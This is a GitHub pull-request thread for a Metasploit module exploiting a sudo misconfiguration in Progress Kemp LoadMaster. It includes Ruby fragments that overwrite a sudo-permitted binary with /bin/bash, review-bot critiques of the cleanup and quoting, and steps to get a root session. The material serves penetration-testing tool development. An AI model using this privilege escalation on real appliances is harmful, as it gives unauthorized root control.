Add Kemp Progress Loadmaster sudo abuse priv esc #19100
Conversation
cmd_exec("sudo /bin/cp #{datastore['TARGET_BINARY']} #{datastore['BINARY_RENAME']}") | ||
|
||
vprint_status("Moving /bin/bash to #{datastore['TARGET_BINARY']}") | ||
cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}") | ||
|
||
vprint_status('Launching payload') | ||
cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") | ||
ensure | ||
if exists?(datastore['BINARY_RENAME']) | ||
cmd_exec("sudo /bin/cp #{datastore['BINARY_RENAME']} #{datastore['TARGET_BINARY']}") | ||
cmd_exec("sudo /bin/rm #{datastore['BINARY_RENAME']}") |
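Review bot: The ensure block restores TARGET_BINARY from BINARY_RENAME but never removes TEMP_PAYLOAD, so the dropped payload file is left on disk after every run; add a `cmd_exec("rm '#{datastore['TEMP_PAYLOAD']}'")` to the cleanup. The datastore values are also interpolated unquoted into every cp/rm command, so a TARGET_BINARY or BINARY_RENAME path containing a space or shell metacharacter breaks both the overwrite and the restore; quote them as `'#{datastore['TARGET_BINARY']}'`.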
For a couple of those commands, sudo isn't required I think
I believe I fixed that.....
vprint_status("Moving #{datastore['TARGET_BINARY']} to #{datastore['BINARY_RENAME']}") | ||
cmd_exec("sudo /bin/cp #{datastore['TARGET_BINARY']} #{datastore['BINARY_RENAME']}") | ||
|
||
vprint_status("Moving /bin/bash to #{datastore['TARGET_BINARY']}") | ||
cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}") | ||
|
||
vprint_status('Launching payload') | ||
cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") |
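Review bot: Neither `cp` result is checked before the payload is launched, so if the overwrite of TARGET_BINARY fails (the author notes in this thread that a direct copy did not have the privileges to overwrite) the module goes on to run `sudo TARGET_BINARY -c TEMP_PAYLOAD` against the untouched original; confirm the copy took effect first, for example by comparing `file_remote_digestmd5(datastore['TARGET_BINARY'])` with the digest of /bin/bash, and fail_with otherwise. The status messages also say "Moving" while both commands are `cp`; "Copying" describes what actually happens.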
Why use /bin/bash to launch the payload, instead of launching it directly?
You're right. I had played with it earlier, and it did not seem to work. I think my problem was that I was trying to directly copy, and I did not have the privileges to overwrite it directly, and needed to put the file in a temp location, then sudo cp the file over /bin/loadkeys. Switched to that, now, unless we're running a command payload.
cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}") | ||
|
||
vprint_status('Launching payload') | ||
cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") |
cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}") | |
cmd_exec("sudo '#{datastore['TARGET_BINARY']}' -c #'{datastore['TEMP_PAYLOAD']}'") |
All suggestions on #19150 should be addressed here, too.... |
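Review bot: The suggested replacement misplaces a quote: `-c #'{datastore['TEMP_PAYLOAD']}'` puts the single quote between `#` and `{`, so Ruby no longer interpolates it and the literal text `#'{datastore['TEMP_PAYLOAD']}'` is handed to bash instead of the payload path. It should read `-c '#{datastore['TEMP_PAYLOAD']}'`, matching the quoting already applied to TARGET_BINARY in the same line.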
execute_command(target_binary, binary_rename, payload.encoded) | ||
end | ||
ensure | ||
cmd_exec("sudo rm '#{target_binary}'") |
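Review bot: `cmd_exec("sudo rm '#{target_binary}'")` in the ensure deletes the sudo-permitted binary outright rather than restoring it, so if execute_command raises before it has put the original back, the host is left without that file and later runs have nothing to overwrite. Restore from binary_rename here (as the earlier revision in this thread did with `sudo /bin/cp`) and only remove when there is no saved copy to restore.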
cmd_exec("sudo rm '#{target_binary}'") | |
cmd_exec("sudo rm '#{target_binary}'") unless target_binary_hash == file_remote_digestmd5(target_binary) |
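Review bot: The suggested guard references `target_binary_hash`, which is not defined anywhere in this hunk; it has to be captured with `file_remote_digestmd5(target_binary)` before the binary is overwritten, otherwise the comparison runs against the already-replaced file and the guard never triggers. The guard also only avoids deleting an untouched binary: when the digest does differ, the ensure still removes the file instead of restoring the saved copy.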
This adds a privilege escalation module targeting Progress Kemp LoadMaster versions including 7.2.59.2.22338. The vulnerability lies in the configuration to allow sudo to auto elevate when run with certain files, but grants the non-root user bal write permissions to those files. This exploit simply overwrites one of the files that auto-elevates with /bin/bash and runs a payload within a root-enabled /bin/bash session.

Verification
List the steps needed to make sure this thing works
- bal user
- use exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024
- set SESSION <session>
- set LHOST <your host IP>
- run
- root user

Note
The easiest way to test this is in conjunction with #18972, which this was a part of until we realized that when they patched CVE-2024-1212, they did not patch this.